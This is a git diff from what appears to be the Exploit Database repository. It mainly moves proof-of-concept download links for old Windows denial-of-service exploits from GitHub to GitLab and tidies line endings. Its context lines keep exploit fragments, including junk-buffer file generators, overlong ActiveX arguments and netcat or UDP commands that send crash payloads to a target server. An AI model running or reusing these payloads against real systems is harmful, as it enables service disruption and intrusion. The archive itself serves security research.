Origin included. diff --git a/exploits/windows/dos/14593.html b/exploits/windows/dos/14593.html index 6ceb98a3a..8ccd5f3eb 100644 --- a/exploits/windows/dos/14593.html +++ b/exploits/windows/dos/14593.html @@ -20,4 +20,4 @@ target.InitLicenKeys arg1 ,nseh ,seh ,arg4 ,arg5 -hadji samir +hadji samir \ No newline at end of file diff --git a/exploits/windows/dos/14642.txt b/exploits/windows/dos/14642.txt index e6c2673a4..5feec4ff2 100644 --- a/exploits/windows/dos/14642.txt +++ b/exploits/windows/dos/14642.txt @@ -8,4 +8,4 @@ After reading the paper, I started studying the TTF format. After initial resear Writeup and proof of concept files included in archive file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14642.tgz (VA010-003.tgz) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14642.tgz (VA010-003.tgz) \ No newline at end of file diff --git a/exploits/windows/dos/14671.py b/exploits/windows/dos/14671.py index 5b039f7bd..20c9a8fb3 100755 --- a/exploits/windows/dos/14671.py +++ b/exploits/windows/dos/14671.py @@ -53,4 +53,4 @@ try: print "[+] File created successfully !" sys.exit(0) except: - print "[-] Error cant write file to system\n" + print "[-] Error cant write file to system\n" \ No newline at end of file diff --git a/exploits/windows/dos/14683.py b/exploits/windows/dos/14683.py index 968844e1b..0fbeffefe 100755 --- a/exploits/windows/dos/14683.py +++ b/exploits/windows/dos/14683.py @@ -73,7 +73,4 @@ try: except: print ("[*] Success! We crashed the server in %d attempts." % x); - print ("[i] [pocoftheday.blogspot.com]"); - - - + print ("[i] [pocoftheday.blogspot.com]"); \ No newline at end of file diff --git a/exploits/windows/dos/14767.txt b/exploits/windows/dos/14767.txt index d6c1e397d..427dbcaf8 100644 --- a/exploits/windows/dos/14767.txt +++ b/exploits/windows/dos/14767.txt @@ -35,4 +35,4 @@ Reproducing this bug: Reproduction is very simple. The first 3 bytes of any SWF file is FWS, to reproduce the issue we need to replace the first byte 'F' with an '`' to make the magic look like '`WS' and load this file into Flash Movie Player. -POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14767.tar.gz \ No newline at end of file +POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14767.tar.gz \ No newline at end of file diff --git a/exploits/windows/dos/14882.txt b/exploits/windows/dos/14882.txt index b596bdf95..01745f1e3 100644 --- a/exploits/windows/dos/14882.txt +++ b/exploits/windows/dos/14882.txt @@ -120,4 +120,4 @@ Stack Reproduction Use attached PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14882.rar (FFDshowSEHExceptionleadingtoNULLpointeronRead.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14883.txt b/exploits/windows/dos/14883.txt index cce12ef34..c4d52c93f 100644 --- a/exploits/windows/dos/14883.txt +++ b/exploits/windows/dos/14883.txt @@ -100,4 +100,4 @@ char data[18448] char data[7807] = -120 PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14883.rar (IntelVideoCodecs5RemoteDenialofService.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14892.py b/exploits/windows/dos/14892.py index b98769310..7242b3f87 100755 --- a/exploits/windows/dos/14892.py +++ b/exploits/windows/dos/14892.py @@ -46,5 +46,4 @@ data2 = ( wizz = open("Mahboul-3lik.xspf","w") wizz.write(data1 + buff + data2) -wizz.close() - +wizz.close() \ No newline at end of file diff --git a/exploits/windows/dos/14937.py b/exploits/windows/dos/14937.py index 103d6041c..89fa1d77d 100755 --- a/exploits/windows/dos/14937.py +++ b/exploits/windows/dos/14937.py @@ -17,5 +17,4 @@ boom =("\x52\x49\x46\x46\x24\x80\x03\x20\x57\x41\x56\x45\x20") buff = ("\x41" * 50000 ) wizz = open("Mahboul-3lik.wav","w") wizz.write(boom + buff ) -wizz.close() - +wizz.close() \ No newline at end of file diff --git a/exploits/windows/dos/14949.py b/exploits/windows/dos/14949.py index bcf7f6855..938691377 100755 --- a/exploits/windows/dos/14949.py +++ b/exploits/windows/dos/14949.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-9-mozilla-firefox-xslt-sort-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14949.zip (moaub-day9-ba.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14949.zip (moaub-day9-ba.zip) ''' diff --git a/exploits/windows/dos/14971.py b/exploits/windows/dos/14971.py index 1ca090b38..9c202e641 100755 --- a/exploits/windows/dos/14971.py +++ b/exploits/windows/dos/14971.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub11-microsoft-office-word-sprmcmajority-buffer-overflow/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14971.zip (moaub-11-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14971.zip (moaub-11-exploit.zip) ''' ''' diff --git a/exploits/windows/dos/14974.txt b/exploits/windows/dos/14974.txt index 97a86f96f..367ae0b6c 100644 --- a/exploits/windows/dos/14974.txt +++ b/exploits/windows/dos/14974.txt @@ -28,4 +28,4 @@ http://elotrolad0.blogspot.com/2010/09/hp-data-protector-media-operations-611.ht by r0i -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14974.rar (HP_Data_Protector_Poc.rar) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14974.rar (HP_Data_Protector_Poc.rar) \ No newline at end of file diff --git a/exploits/windows/dos/14992.py b/exploits/windows/dos/14992.py index 8152f72e9..12ec72b4c 100755 --- a/exploits/windows/dos/14992.py +++ b/exploits/windows/dos/14992.py @@ -22,7 +22,7 @@ CVE : CVE-2010-3000 # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14992.zip (moaub-13-exploit.zip) +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14992.zip (moaub-13-exploit.zip) import sys diff --git a/exploits/windows/dos/15019.txt b/exploits/windows/dos/15019.txt index f4f92e6ed..552f2a5a9 100644 --- a/exploits/windows/dos/15019.txt +++ b/exploits/windows/dos/15019.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15019.rar (HFPicture_PoC.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15019.rar (HFPicture_PoC.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15027.py b/exploits/windows/dos/15027.py index b13f6fb1a..251f6d4df 100755 --- a/exploits/windows/dos/15027.py +++ b/exploits/windows/dos/15027.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-17-firefox-plugin-parameter-ensurecachedattrparamarrays-remote-code-execution/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15027.zip (moaub-17-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15027.zip (moaub-17-exploit.zip) ''' ''' Title : Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution diff --git a/exploits/windows/dos/15034.txt b/exploits/windows/dos/15034.txt index ee7141b1b..4c073ea5e 100644 --- a/exploits/windows/dos/15034.txt +++ b/exploits/windows/dos/15034.txt @@ -5,4 +5,4 @@ # Version: winxp/sp3 # Tested on: winxp/sp2/sp3 -BMP File: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15034.zip \ No newline at end of file +BMP File: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15034.zip \ No newline at end of file diff --git a/exploits/windows/dos/15065.txt b/exploits/windows/dos/15065.txt index 29140fa9d..6f5544731 100644 --- a/exploits/windows/dos/15065.txt +++ b/exploits/windows/dos/15065.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1248 here is BA : http://www.exploit-db.com/moaub-21-microsoft-excel-wopt-record-parsing-heap-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15065.rar (moaub-21-exploit.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15065.rar (moaub-21-exploit.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15076.py b/exploits/windows/dos/15076.py index 1d6246793..a37870659 100755 --- a/exploits/windows/dos/15076.py +++ b/exploits/windows/dos/15076.py @@ -19,7 +19,7 @@ Twitter : @abysssec http://www.exploit-db.com/moaub-22-adobe-shockwave-director-tsac-chunk-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15076.zip (moaub-22-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15076.zip (moaub-22-exploit.zip) ''' diff --git a/exploits/windows/dos/15088.txt b/exploits/windows/dos/15088.txt index 1fd01a74c..56a49365d 100644 --- a/exploits/windows/dos/15088.txt +++ b/exploits/windows/dos/15088.txt @@ -18,4 +18,4 @@ CVE : NO CVE here is BA : http://www.exploit-db.com/moaub-23-microsoft-office-excel-2002-memory-corruption-vulnerability-0day/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15088.zip (moaub-23-excel-poc.zip) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15088.zip (moaub-23-excel-poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15096.py b/exploits/windows/dos/15096.py index a11937e78..d04d2cbe4 100755 --- a/exploits/windows/dos/15096.py +++ b/exploits/windows/dos/15096.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-24-microsoft-mpeg-layer-3-audio-decoder-division-by-zero/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15096.zip (moaub-24-mp3-exploit.zip) ''' ''' diff --git a/exploits/windows/dos/15104.py b/exploits/windows/dos/15104.py index a1ad75e58..b38ad491d 100755 --- a/exploits/windows/dos/15104.py +++ b/exploits/windows/dos/15104.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15104.zip (moaub-25-exploit.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip) ''' diff --git a/exploits/windows/dos/15148.txt b/exploits/windows/dos/15148.txt index adb211e10..97edba9c1 100644 --- a/exploits/windows/dos/15148.txt +++ b/exploits/windows/dos/15148.txt @@ -18,4 +18,4 @@ CVE : CVE-2010-1245 here is BA : http://www.exploit-db.com/moaub-29-microsoft-excel-sxview-record-parsing-memory-corruption/ -here is the PoC : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15148.rar (moaub-29-exploit.rar) \ No newline at end of file +here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15148.rar (moaub-29-exploit.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15158.py b/exploits/windows/dos/15158.py index eb98cbf6d..62a4db7dc 100755 --- a/exploits/windows/dos/15158.py +++ b/exploits/windows/dos/15158.py @@ -21,7 +21,7 @@ MOAUB Number : MOAUB-FINAL http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15158.zip (moaub-30-PoC.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15158.zip (moaub-30-PoC.zip) ''' import sys diff --git a/exploits/windows/dos/15248.txt b/exploits/windows/dos/15248.txt index 8dcdb3d06..80f87fe2d 100644 --- a/exploits/windows/dos/15248.txt +++ b/exploits/windows/dos/15248.txt @@ -102,7 +102,7 @@ of the track. http://aluigi.org/poc/winamp_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15248.zip (winamp_1_13Oct10.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15248.zip (winamp_1_13Oct10.zip) ####################################################################### diff --git a/exploits/windows/dos/15259.txt b/exploits/windows/dos/15259.txt index 9daae8bb8..4eb7ec78d 100644 --- a/exploits/windows/dos/15259.txt +++ b/exploits/windows/dos/15259.txt @@ -75,7 +75,7 @@ caused by the usage of strcpy() with the data supplied by the attacker. http://aluigi.org/poc/realwin_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15259.zip (realwin_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15259.zip (realwin_1.zip) nc SERVER 912 < realwin_1a.dat nc SERVER 912 < realwin_1b.dat diff --git a/exploits/windows/dos/15260.txt b/exploits/windows/dos/15260.txt index 0859130bd..1e0dca3ad 100644 --- a/exploits/windows/dos/15260.txt +++ b/exploits/windows/dos/15260.txt @@ -60,7 +60,7 @@ didn't result exploitable. http://aluigi.org/poc/unirpcd_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15260.zip (unirpcd_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15260.zip (unirpcd_1.zip) ####################################################################### diff --git a/exploits/windows/dos/15407.txt b/exploits/windows/dos/15407.txt index f46d3211c..67cdd6af7 100644 --- a/exploits/windows/dos/15407.txt +++ b/exploits/windows/dos/15407.txt @@ -121,4 +121,4 @@ Followup: MachineOwner 3.Proof of concept is in poc.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15407.zip (poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15407.zip (poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15408.html b/exploits/windows/dos/15408.html index c7fa537f5..636404407 100644 --- a/exploits/windows/dos/15408.html +++ b/exploits/windows/dos/15408.html @@ -16,6 +16,4 @@ arg1=String(65535, "A") target.SearchByFormula arg1 - - - + \ No newline at end of file diff --git a/exploits/windows/dos/15419.txt b/exploits/windows/dos/15419.txt index a6be8a3c3..b79a44afd 100644 --- a/exploits/windows/dos/15419.txt +++ b/exploits/windows/dos/15419.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15419.bin (xpl_pdf.bin) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15419.bin (xpl_pdf.bin) http://extraexploit.blogspot.com/2010/11/full-disclosure-xplpdf-adober-reader-94.html \ No newline at end of file diff --git a/exploits/windows/dos/15426.txt b/exploits/windows/dos/15426.txt index fe6b85300..b1cabe944 100644 --- a/exploits/windows/dos/15426.txt +++ b/exploits/windows/dos/15426.txt @@ -58,4 +58,4 @@ short BranchOffset, value -305 BranchOffset is located @ E6h-E7h -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) \ No newline at end of file +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15426.rar (adobe_flash_int_ovrflw_poc.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15429.txt b/exploits/windows/dos/15429.txt index 9bd27a90b..25ca02770 100644 --- a/exploits/windows/dos/15429.txt +++ b/exploits/windows/dos/15429.txt @@ -19,8 +19,4 @@ Target Directory : "c:\fuzz\bkf\" #Create the directory if it's dosent existe in Execute menu Application : "C:\WINDOWS\system32\ntbackup.exe" -Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash - - - - +Arguments : by default its "{0}" change it to "{A}" and presse execute wish will cause the application to crash \ No newline at end of file diff --git a/exploits/windows/dos/15444.txt b/exploits/windows/dos/15444.txt index ea357b213..a3162bfe7 100644 --- a/exploits/windows/dos/15444.txt +++ b/exploits/windows/dos/15444.txt @@ -122,4 +122,4 @@ Followup: MachineOwner 3.PoC is in NtOpenKey_poc.zip file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15444.zip (NtOpenKey_poc.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15444.zip (NtOpenKey_poc.zip) \ No newline at end of file diff --git a/exploits/windows/dos/15514.txt b/exploits/windows/dos/15514.txt index 94cdae8aa..0d5614212 100644 --- a/exploits/windows/dos/15514.txt +++ b/exploits/windows/dos/15514.txt @@ -2,4 +2,4 @@ Foxit Reader 4.1.1 is subject to a stack overflow vulnerability when parsing ove The included PoC results in a SEH overwrite. The exception must be passed twice in order to reach the overwritten handler. This vulnerability was reported to the vendor and was patched in Foxit Reader 4.2. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15514.pdf (foxit_411_poc.pdf) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15514.pdf (foxit_411_poc.pdf) \ No newline at end of file diff --git a/exploits/windows/dos/15581.txt b/exploits/windows/dos/15581.txt index 256db3170..b006a81d3 100644 --- a/exploits/windows/dos/15581.txt +++ b/exploits/windows/dos/15581.txt @@ -61,4 +61,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4978.php PoC: http://www.zeroscience.mk/codes/pocs_ens_ism.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15581.rar (pocs_ens_ism.rar) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15581.rar (pocs_ens_ism.rar) \ No newline at end of file diff --git a/exploits/windows/dos/15698.html b/exploits/windows/dos/15698.html index fecb81715..851ef5bf0 100644 --- a/exploits/windows/dos/15698.html +++ b/exploits/windows/dos/15698.html @@ -9,7 +9,7 @@ File Description : Macromedia Flash Player 6.0 r88 Notes : This triggers a NULL Pointer reference on a register operation Notes : The "AllowScriptAccess" parameter is written to ESI and EAX Notes : I was not able to gain execution, can you? -Flash 6: : https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15698.rar +Flash 6: : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15698.rar ********************************************************************************************** --> diff --git a/exploits/windows/dos/15992.txt b/exploits/windows/dos/15992.txt index 82952830d..6de6e98cd 100644 --- a/exploits/windows/dos/15992.txt +++ b/exploits/windows/dos/15992.txt @@ -89,7 +89,7 @@ copying the input data in a temporary buffer of about 60 bytes: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15992.zip (udpsz.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip (udpsz.zip) udpsz -T -b a -C 020101 SERVER 46823 1000 diff --git a/exploits/windows/dos/16120.py b/exploits/windows/dos/16120.py index eae0d609d..d601da3c9 100755 --- a/exploits/windows/dos/16120.py +++ b/exploits/windows/dos/16120.py @@ -34,5 +34,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/16121.py b/exploits/windows/dos/16121.py index 177d9bec0..8475cae02 100755 --- a/exploits/windows/dos/16121.py +++ b/exploits/windows/dos/16121.py @@ -21,8 +21,4 @@ try: f.close() print "File created" except: - print "File cannot be created" - - - - + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/1615.txt b/exploits/windows/dos/1615.txt index 8e1445e03..33cf5e24e 100644 --- a/exploits/windows/dos/1615.txt +++ b/exploits/windows/dos/1615.txt @@ -1,4 +1,4 @@ -# Full archive at https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1615.rar (excel_03262006.rar) +# Full archive at https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1615.rar (excel_03262006.rar) Topic : Microsoft Office 2002 - Excel/Powerpoint/Word.. 10.0.2614.0 => 11.0.5612.0 Date : 02/12/2006 diff --git a/exploits/windows/dos/16230.py b/exploits/windows/dos/16230.py index 8185e4cc2..01c0c4046 100755 --- a/exploits/windows/dos/16230.py +++ b/exploits/windows/dos/16230.py @@ -99,4 +99,4 @@ try: except: - print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" + print "\t\t[+]Erro ao Se Conectar no Servidor "+sys.argv[1]+" Na Porta "+sys.argv[2]+"\n" \ No newline at end of file diff --git a/exploits/windows/dos/16254.txt b/exploits/windows/dos/16254.txt index f53b054c8..fa529088f 100644 --- a/exploits/windows/dos/16254.txt +++ b/exploits/windows/dos/16254.txt @@ -44,7 +44,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4999.php -------- PoC: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16254.rar (nitropdf_poc.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/16254.rar (nitropdf_poc.rar) http://www.zeroscience.mk/codes/nitropdf_poc.rar -------- \ No newline at end of file diff --git a/exploits/windows/dos/16255.pl b/exploits/windows/dos/16255.pl index e3b7b3ac6..b5521684c 100755 --- a/exploits/windows/dos/16255.pl +++ b/exploits/windows/dos/16255.pl @@ -11,4 +11,4 @@ open($FILE,">$file"); print $FILE $junk; close($FILE); print "Files Created successfully\n"; -sleep(1); +sleep(1); \ No newline at end of file diff --git a/exploits/windows/dos/17019.txt b/exploits/windows/dos/17019.txt index cf79b68b8..179b47640 100644 --- a/exploits/windows/dos/17019.txt +++ b/exploits/windows/dos/17019.txt @@ -181,7 +181,7 @@ From rvrender.dll (base address 63AE0000): http://aluigi.org/poc/real_5.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17019.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17019.zip the amount of data to copy is the 32bit big endian value located at offset 0x7801 of real_5.ivr. diff --git a/exploits/windows/dos/17023.txt b/exploits/windows/dos/17023.txt index b749673bc..048bd4433 100644 --- a/exploits/windows/dos/17023.txt +++ b/exploits/windows/dos/17023.txt @@ -13,8 +13,8 @@ http://aluigi.org/adv/genesis_11-adv.txt http://aluigi.org/adv/genesis_12-adv.txt http://aluigi.org/adv/genesis_13-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-adv.tar.gz (iconics_genesis_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-poc.tar.gz (iconics_genesis_poc.tar.gz) ####################################################################### @@ -105,7 +105,7 @@ The Code =========== http://aluigi.org/poc/genesis_1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-1.zip (genesis_1.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-1.zip (genesis_1.zip) ####################################################################### @@ -157,7 +157,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 1 SERVER @@ -212,7 +212,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 2 SERVER @@ -280,7 +280,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 3 SERVER @@ -339,7 +339,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 4 SERVER @@ -388,7 +388,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 5 SERVER @@ -437,7 +437,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 6 SERVER @@ -486,7 +486,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 7 SERVER @@ -529,7 +529,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 8 SERVER @@ -574,7 +574,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 9 SERVER @@ -625,7 +625,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 10 SERVER @@ -673,7 +673,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 11 SERVER @@ -718,7 +718,7 @@ The Code =========== http://aluigi.org/poc/genesis_iof.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17023-2.zip (genesis_iof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17023-2.zip (genesis_iof.zip) genesis_iof 12 SERVER diff --git a/exploits/windows/dos/17025.txt b/exploits/windows/dos/17025.txt index bbdb5f9c3..ef18181d2 100644 --- a/exploits/windows/dos/17025.txt +++ b/exploits/windows/dos/17025.txt @@ -7,8 +7,8 @@ http://aluigi.org/adv/realwin_6-adv.txt http://aluigi.org/adv/realwin_7-adv.txt http://aluigi.org/adv/realwin_8-adv.txt -Advisory Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz) -PoC Archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz) +Advisory Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-adv.tar.gz (datac_realwin_adv.tar.gz) +PoC Archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17025-poc.tar.tz (datac_realwin_poc.tar.gz) ####################################################################### @@ -54,7 +54,7 @@ The Code =========== http://aluigi.org/poc/realwin_2.zip 